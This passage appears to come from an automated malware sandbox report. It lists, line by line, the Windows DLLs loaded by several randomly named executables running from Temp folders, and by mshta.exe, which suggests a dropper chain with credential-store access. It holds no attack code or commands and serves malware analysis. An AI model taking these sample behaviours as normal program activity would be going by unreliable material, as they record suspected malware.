                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: wtsapi32.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: winsta.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: explorerframe.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\Desktop\M6gQuZPvgY.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: mstask.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: mpr.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: dui70.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: duser.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: chartv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: oleacc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: atlthunk.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: textinputframework.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: coreuicomponents.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: ntmarta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: coremessaging.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: wtsapi32.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: winsta.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: textshaping.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: explorerframe.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: wininet.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: sspicli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: iertutil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: windows.storage.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: wldp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: profapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: kernel.appcore.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: winhttp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: mswsock.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: iphlpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: winnsi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: urlmon.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: srvcli.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: netutils.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: dnsapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: rasadhlp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: fwpuclnt.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: schannel.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: mskeyprotect.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: ntasn1.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: msasn1.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: dpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: cryptsp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: rsaenh.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: cryptbase.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: gpapi.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: ncrypt.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: ncryptsslp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: uxtheme.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: propsys.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: edputil.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: wintypes.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: appresolver.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: bcp47langs.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: slc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: userenv.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: sppc.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeSection loaded: apphelp.dllJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: webio.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: schannel.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: mskeyprotect.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ntasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ncrypt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ncryptsslp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: msasn1.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: cryptsp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: rsaenh.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: gpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: dpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: wbemcomn.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: amsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: apphelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: netapi32.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: vaultcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: wintypes.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: dbghelp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: dsrole.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: iertutil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: sspicli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: profapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: ondemandconnroutehelper.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: winhttp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: mswsock.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: winnsi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: urlmon.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: srvcli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: netutils.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: dnsapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: rasadhlp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: fwpuclnt.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: ntmarta.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: dpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: cryptbase.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: mozglue.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: wsock32.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: vcruntime140.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: msvcp140.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: vcruntime140.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: windowscodecs.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: propsys.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: edputil.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: windows.staterepositoryps.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: appresolver.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: bcp47langs.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: slc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: sppc.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: onecorecommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: onecoreuapcommonproxystub.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: pcacli.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: mpr.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeSection loaded: sfc_os.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: wsock32.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: version.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: winmm.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: mpr.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: wininet.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: iphlpapi.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: userenv.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: uxtheme.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: windows.storage.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: wldp.dll
                                      Source: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dll
                                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dll
